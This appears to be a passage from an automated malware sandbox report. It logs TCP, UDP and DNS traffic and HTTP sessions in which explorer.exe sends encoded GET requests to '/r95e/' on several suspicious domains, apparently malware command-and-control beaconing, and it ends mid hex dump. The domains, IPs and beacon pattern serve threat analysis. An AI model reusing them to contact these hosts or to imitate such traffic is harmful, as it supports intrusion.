                                          Sep 27, 2021 21:06:35.713982105 CEST804982934.102.136.180192.168.2.4
                                          Sep 27, 2021 21:06:35.714169025 CEST4982980192.168.2.434.102.136.180
                                          Sep 27, 2021 21:06:35.714364052 CEST4982980192.168.2.434.102.136.180
                                          Sep 27, 2021 21:06:35.726947069 CEST804982934.102.136.180192.168.2.4
                                          Sep 27, 2021 21:06:35.892570972 CEST804982934.102.136.180192.168.2.4
                                          Sep 27, 2021 21:06:35.892592907 CEST804982934.102.136.180192.168.2.4
                                          Sep 27, 2021 21:06:35.892792940 CEST4982980192.168.2.434.102.136.180
                                          Sep 27, 2021 21:06:35.892947912 CEST4982980192.168.2.434.102.136.180
                                          Sep 27, 2021 21:06:35.905397892 CEST804982934.102.136.180192.168.2.4
                                          Sep 27, 2021 21:06:40.974280119 CEST4983980192.168.2.45.9.90.226
                                          Sep 27, 2021 21:06:40.999039888 CEST80498395.9.90.226192.168.2.4
                                          Sep 27, 2021 21:06:40.999228001 CEST4983980192.168.2.45.9.90.226
                                          Sep 27, 2021 21:06:40.999752998 CEST4983980192.168.2.45.9.90.226
                                          Sep 27, 2021 21:06:41.026427031 CEST80498395.9.90.226192.168.2.4
                                          Sep 27, 2021 21:06:41.026473045 CEST80498395.9.90.226192.168.2.4
                                          Sep 27, 2021 21:06:41.026489019 CEST80498395.9.90.226192.168.2.4
                                          Sep 27, 2021 21:06:41.026765108 CEST4983980192.168.2.45.9.90.226
                                          Sep 27, 2021 21:06:41.026814938 CEST4983980192.168.2.45.9.90.226
                                          Sep 27, 2021 21:06:41.055721998 CEST80498395.9.90.226192.168.2.4
                                          Sep 27, 2021 21:07:01.652254105 CEST4984980192.168.2.435.246.6.109
                                          Sep 27, 2021 21:07:01.684393883 CEST804984935.246.6.109192.168.2.4
                                          Sep 27, 2021 21:07:01.684525967 CEST4984980192.168.2.435.246.6.109
                                          Sep 27, 2021 21:07:01.684684992 CEST4984980192.168.2.435.246.6.109
                                          Sep 27, 2021 21:07:01.716600895 CEST804984935.246.6.109192.168.2.4
                                          Sep 27, 2021 21:07:01.767618895 CEST804984935.246.6.109192.168.2.4
                                          Sep 27, 2021 21:07:01.767653942 CEST804984935.246.6.109192.168.2.4
                                          Sep 27, 2021 21:07:01.767867088 CEST4984980192.168.2.435.246.6.109
                                          Sep 27, 2021 21:07:01.774135113 CEST4984980192.168.2.435.246.6.109
                                          Sep 27, 2021 21:07:01.806262970 CEST804984935.246.6.109192.168.2.4
                                          Sep 27, 2021 21:07:11.864828110 CEST4986280192.168.2.4172.67.148.98
                                          Sep 27, 2021 21:07:11.884675026 CEST8049862172.67.148.98192.168.2.4
                                          Sep 27, 2021 21:07:11.884784937 CEST4986280192.168.2.4172.67.148.98
                                          Sep 27, 2021 21:07:11.884968996 CEST4986280192.168.2.4172.67.148.98
                                          Sep 27, 2021 21:07:11.906678915 CEST8049862172.67.148.98192.168.2.4
                                          Sep 27, 2021 21:07:12.270593882 CEST8049862172.67.148.98192.168.2.4
                                          Sep 27, 2021 21:07:12.270634890 CEST8049862172.67.148.98192.168.2.4
                                          Sep 27, 2021 21:07:12.270663023 CEST8049862172.67.148.98192.168.2.4
                                          Sep 27, 2021 21:07:12.270725012 CEST8049862172.67.148.98192.168.2.4
                                          Sep 27, 2021 21:07:12.270749092 CEST8049862172.67.148.98192.168.2.4
                                          Sep 27, 2021 21:07:12.270771027 CEST8049862172.67.148.98192.168.2.4
                                          Sep 27, 2021 21:07:12.270791054 CEST8049862172.67.148.98192.168.2.4
                                          Sep 27, 2021 21:07:12.270921946 CEST8049862172.67.148.98192.168.2.4
                                          Sep 27, 2021 21:07:12.270957947 CEST4986280192.168.2.4172.67.148.98
                                          Sep 27, 2021 21:07:12.271037102 CEST4986280192.168.2.4172.67.148.98
                                          Sep 27, 2021 21:07:12.271249056 CEST4986280192.168.2.4172.67.148.98
                                          Sep 27, 2021 21:07:17.350616932 CEST4986380192.168.2.4202.165.66.108
                                          Sep 27, 2021 21:07:17.621839046 CEST8049863202.165.66.108192.168.2.4
                                          Sep 27, 2021 21:07:17.621975899 CEST4986380192.168.2.4202.165.66.108
                                          Sep 27, 2021 21:07:17.622366905 CEST4986380192.168.2.4202.165.66.108
                                          Sep 27, 2021 21:07:17.893615961 CEST8049863202.165.66.108192.168.2.4
                                          Sep 27, 2021 21:07:18.128928900 CEST4986380192.168.2.4202.165.66.108
                                          Sep 27, 2021 21:07:18.216249943 CEST8049863202.165.66.108192.168.2.4
                                          Sep 27, 2021 21:07:18.216413975 CEST4986380192.168.2.4202.165.66.108
                                          Sep 27, 2021 21:07:18.216514111 CEST8049863202.165.66.108192.168.2.4
                                          Sep 27, 2021 21:07:18.216593981 CEST4986380192.168.2.4202.165.66.108
                                          Sep 27, 2021 21:07:18.400197983 CEST8049863202.165.66.108192.168.2.4
                                          Sep 27, 2021 21:07:18.400415897 CEST4986380192.168.2.4202.165.66.108

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 27, 2021 21:05:12.751811981 CEST5309753192.168.2.48.8.8.8
                                          Sep 27, 2021 21:05:12.765037060 CEST53530978.8.8.8192.168.2.4
                                          Sep 27, 2021 21:05:12.815171957 CEST4925753192.168.2.48.8.8.8
                                          Sep 27, 2021 21:05:12.849423885 CEST53492578.8.8.8192.168.2.4
                                          Sep 27, 2021 21:05:15.308841944 CEST6238953192.168.2.48.8.8.8
                                          Sep 27, 2021 21:05:15.328419924 CEST53623898.8.8.8192.168.2.4
                                          Sep 27, 2021 21:05:47.821726084 CEST4991053192.168.2.48.8.8.8
                                          Sep 27, 2021 21:05:47.856849909 CEST53499108.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:04.935619116 CEST5585453192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:04.949014902 CEST53558548.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:19.382409096 CEST6454953192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:19.466084003 CEST53645498.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:20.491133928 CEST6315353192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:20.590030909 CEST53631538.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:21.112752914 CEST5299153192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:21.126204014 CEST53529918.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:21.517863989 CEST5370053192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:21.532602072 CEST53537008.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:21.997997999 CEST5172653192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:22.071230888 CEST53517268.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:22.568157911 CEST5679453192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:22.602807999 CEST53567948.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:22.627233982 CEST5653453192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:22.640460014 CEST53565348.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:23.116815090 CEST5662753192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:23.130039930 CEST53566278.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:23.803390026 CEST5662153192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:23.819374084 CEST53566218.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:24.670516014 CEST6311653192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:24.684900999 CEST53631168.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:25.197482109 CEST6407853192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:25.270685911 CEST53640788.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:25.463162899 CEST6480153192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:25.505198002 CEST53648018.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:26.416028976 CEST6172153192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:26.434570074 CEST53617218.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:30.520242929 CEST5125553192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:30.547971010 CEST53512558.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:35.663887978 CEST6152253192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:35.699017048 CEST53615228.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:40.929733038 CEST5233753192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:40.970762968 CEST53523378.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:46.039324045 CEST5504653192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:46.097685099 CEST53550468.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:51.119846106 CEST4961253192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:51.155942917 CEST53496128.8.8.8192.168.2.4
                                          Sep 27, 2021 21:07:01.369004965 CEST4928553192.168.2.48.8.8.8
                                          Sep 27, 2021 21:07:01.650717974 CEST53492858.8.8.8192.168.2.4
                                          Sep 27, 2021 21:07:06.746467113 CEST5060153192.168.2.48.8.8.8
                                          Sep 27, 2021 21:07:06.774045944 CEST53506018.8.8.8192.168.2.4
                                          Sep 27, 2021 21:07:06.792208910 CEST6087553192.168.2.48.8.8.8
                                          Sep 27, 2021 21:07:06.828392029 CEST53608758.8.8.8192.168.2.4
                                          Sep 27, 2021 21:07:08.524833918 CEST5644853192.168.2.48.8.8.8
                                          Sep 27, 2021 21:07:08.539501905 CEST53564488.8.8.8192.168.2.4
                                          Sep 27, 2021 21:07:11.835009098 CEST5917253192.168.2.48.8.8.8
                                          Sep 27, 2021 21:07:11.863893032 CEST53591728.8.8.8192.168.2.4
                                          Sep 27, 2021 21:07:17.312665939 CEST6242053192.168.2.48.8.8.8
                                          Sep 27, 2021 21:07:17.348882914 CEST53624208.8.8.8192.168.2.4
                                          Sep 27, 2021 21:07:23.146285057 CEST6057953192.168.2.48.8.8.8
                                          Sep 27, 2021 21:07:23.229141951 CEST53605798.8.8.8192.168.2.4
                                          Sep 27, 2021 21:07:28.240982056 CEST5018353192.168.2.48.8.8.8
                                          Sep 27, 2021 21:07:29.255203009 CEST5018353192.168.2.48.8.8.8
                                          Sep 27, 2021 21:07:29.344136953 CEST53501838.8.8.8192.168.2.4

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Sep 27, 2021 21:06:25.463162899 CEST192.168.2.48.8.8.80xaa6bStandard query (0)www.kxdrstone.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:30.520242929 CEST192.168.2.48.8.8.80xd5e4Standard query (0)www.nurhalilah.xyzA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:35.663887978 CEST192.168.2.48.8.8.80xccddStandard query (0)www.uscryptomininglaws.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:40.929733038 CEST192.168.2.48.8.8.80x924eStandard query (0)www.financecreditpro.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:46.039324045 CEST192.168.2.48.8.8.80xc1cbStandard query (0)www.smpldebts.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:51.119846106 CEST192.168.2.48.8.8.80xcfe3Standard query (0)www.portale-accessi-anomali.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:01.369004965 CEST192.168.2.48.8.8.80x4e51Standard query (0)www.lottochain.betA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:06.792208910 CEST192.168.2.48.8.8.80x1e46Standard query (0)www.healthcaresms.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:11.835009098 CEST192.168.2.48.8.8.80x7048Standard query (0)www.2377k.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:17.312665939 CEST192.168.2.48.8.8.80xc19aStandard query (0)www.drive16pay.artA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:23.146285057 CEST192.168.2.48.8.8.80xfcd1Standard query (0)www.21lawsofconfidence.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:28.240982056 CEST192.168.2.48.8.8.80xf6d2Standard query (0)www.byemreperde.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:29.255203009 CEST192.168.2.48.8.8.80xf6d2Standard query (0)www.byemreperde.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Sep 27, 2021 21:06:25.505198002 CEST8.8.8.8192.168.2.40xaa6bName error (3)www.kxdrstone.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:30.547971010 CEST8.8.8.8192.168.2.40xd5e4No error (0)www.nurhalilah.xyz104.21.11.163A (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:30.547971010 CEST8.8.8.8192.168.2.40xd5e4No error (0)www.nurhalilah.xyz172.67.166.108A (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:35.699017048 CEST8.8.8.8192.168.2.40xccddNo error (0)www.uscryptomininglaws.comuscryptomininglaws.comCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 21:06:35.699017048 CEST8.8.8.8192.168.2.40xccddNo error (0)uscryptomininglaws.com34.102.136.180A (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:40.970762968 CEST8.8.8.8192.168.2.40x924eNo error (0)www.financecreditpro.com5.9.90.226A (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:46.097685099 CEST8.8.8.8192.168.2.40xc1cbName error (3)www.smpldebts.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:51.155942917 CEST8.8.8.8192.168.2.40xcfe3Name error (3)www.portale-accessi-anomali.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:01.650717974 CEST8.8.8.8192.168.2.40x4e51No error (0)www.lottochain.betwww215.wixdns.netCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 21:07:01.650717974 CEST8.8.8.8192.168.2.40x4e51No error (0)www215.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 21:07:01.650717974 CEST8.8.8.8192.168.2.40x4e51No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 21:07:01.650717974 CEST8.8.8.8192.168.2.40x4e51No error (0)5f36b111-balancer.wixdns.nettd-balancer-euw2-6-109.wixdns.netCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 21:07:01.650717974 CEST8.8.8.8192.168.2.40x4e51No error (0)td-balancer-euw2-6-109.wixdns.net35.246.6.109A (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:06.828392029 CEST8.8.8.8192.168.2.40x1e46Name error (3)www.healthcaresms.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:11.863893032 CEST8.8.8.8192.168.2.40x7048No error (0)www.2377k.com172.67.148.98A (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:11.863893032 CEST8.8.8.8192.168.2.40x7048No error (0)www.2377k.com104.21.95.204A (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:17.348882914 CEST8.8.8.8192.168.2.40xc19aNo error (0)www.drive16pay.art202.165.66.108A (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:23.229141951 CEST8.8.8.8192.168.2.40xfcd1Name error (3)www.21lawsofconfidence.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:29.344136953 CEST8.8.8.8192.168.2.40xf6d2Server failure (2)www.byemreperde.comnonenoneA (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.nurhalilah.xyz
                                          • www.uscryptomininglaws.com
                                          • www.financecreditpro.com
                                          • www.lottochain.bet
                                          • www.2377k.com
                                          • www.drive16pay.art

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.449828104.21.11.16380C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 21:06:30.575259924 CEST6368OUTGET /r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL00 HTTP/1.1
                                          Host: www.nurhalilah.xyz
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 21:06:30.639205933 CEST6369INHTTP/1.1 301 Moved Permanently
                                          Date: Mon, 27 Sep 2021 19:06:30 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          location: http://nurhalilah.xyz/r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL00
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ejOSNG8T2aT1OBl7nSpcHjNMnlNv3fyuC2y9V2YU1Ybr7aR%2F8NvfA%2B3bKRAZJYtqSa7OoxuMXeGni7nL01h13aZ6eWXQ%2B92UBKeF5EjJ5o5SPVrRZiHWjsRCX0crUEqGXOshnxA%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 695702752fad05e9-FRA
                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                          Data Raw: 62 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                          Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                                          Sep 27, 2021 21:06:30.639230967 CEST6369INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.44982934.102.136.18080C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 21:06:35.714364052 CEST6370OUTGET /r95e/?5jTDyZ=BXQ0bbTmKEXRUVKMKrV3wGde7K0OnYr2R+4D0hwUDGvbHRTPKc91vtcYWtUAnnCzzr+p&l2M=TL00 HTTP/1.1
                                          Host: www.uscryptomininglaws.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 21:06:35.892570972 CEST6370INHTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Mon, 27 Sep 2021 19:06:35 GMT
                                          Content-Type: text/html
                                          Content-Length: 275
                                          ETag: "6151bfae-113"
                                          Via: 1.1 google
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.4498395.9.90.22680C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 21:06:40.999752998 CEST6391OUTGET /r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL00 HTTP/1.1
                                          Host: www.financecreditpro.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 21:06:41.026473045 CEST6393INHTTP/1.1 301 Moved Permanently
                                          Server: nginx/1.20.1
                                          Date: Mon, 27 Sep 2021 19:06:41 GMT
                                          Content-Type: text/html
                                          Content-Length: 169
                                          Connection: close
                                          Location: http://financecreditpro.com/r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL00
                                          Strict-Transport-Security: max-age=31536000
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          3192.168.2.44984935.246.6.10980C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 21:07:01.684684992 CEST6415OUTGET /r95e/?5jTDyZ=TgnCaJJuD0kHzauLDq/dXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL00 HTTP/1.1
                                          Host: www.lottochain.bet
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 21:07:01.767618895 CEST6416INHTTP/1.1 301 Moved Permanently
                                          Date: Mon, 27 Sep 2021 19:07:01 GMT
                                          Content-Length: 0
                                          Connection: close
                                          location: https://www.lottochain.bet/r95e?5jTDyZ=TgnCaJJuD0kHzauLDq%2FdXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL00
                                          strict-transport-security: max-age=120
                                          x-wix-request-id: 1632769621.701204728676110080
                                          Age: 0
                                          Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                          X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVi7JwZOAS6ilH0jZpKLTjKF,qquldgcFrj2n046g4RNSVHgoSL3TVJh4IE7YwTXHesA=,2d58ifebGbosy5xc+FRalqCg7GVJ0AblbBa19E7yp9/Jevmsc5dw521bQk+YVUcMC5pgEgJzARPPe1194hBnp8TkJSrzujHds9w7kmIwT90=,2UNV7KOq4oGjA5+PKsX47IJCkNcL1UXXT2AxlbYijuBYgeUJqUXtid+86vZww+nL,YO37Gu9ywAGROWP0rn2IfgW5PRv7IKD225xALAZbAmk=,LXlT8qjS5x6WBejJA3+gBeGvZbATxKf3YHVGfwvvgmSTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,UvY1uiXtmgas6aI2l+unv1BiX1kNVdl/4TGIg4ZwPbq2MDV1s43JGm4rKGF0jsK6iy9RDN50yNDYuMRjpFglRg==
                                          Cache-Control: no-cache
                                          X-Content-Type-Options: nosniff
                                          Server: Pepyaka/1.19.10


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          4192.168.2.449862172.67.148.9880C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 21:07:11.884968996 CEST6458OUTGET /r95e/?5jTDyZ=Bz2f4T/F+fkIMVoJU/amRd6ca64J0uSW6dugIGIPMe5NoTdXMzMXV3yFXHZPUv8ChFjS&l2M=TL00 HTTP/1.1
                                          Host: www.2377k.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 21:07:12.270593882 CEST6459INHTTP/1.1 404 Not Found
                                          Date: Mon, 27 Sep 2021 19:07:12 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          vary: Accept-Encoding
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L1%2Fcb9sF0iYG9tLZL%2BCND7WWwL50k6FpCO6GkNPjTY8HledrDzcbyuzJAJs%2BC3yUD5GaZvDIhbwwTZOsvt8Qf3jJY5JuckW7ioIU2oZopXGVv5Lg9KbGsLMIggxHDd9g"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 6957037758895c14-FRA
                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                          Data Raw: 31 63 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 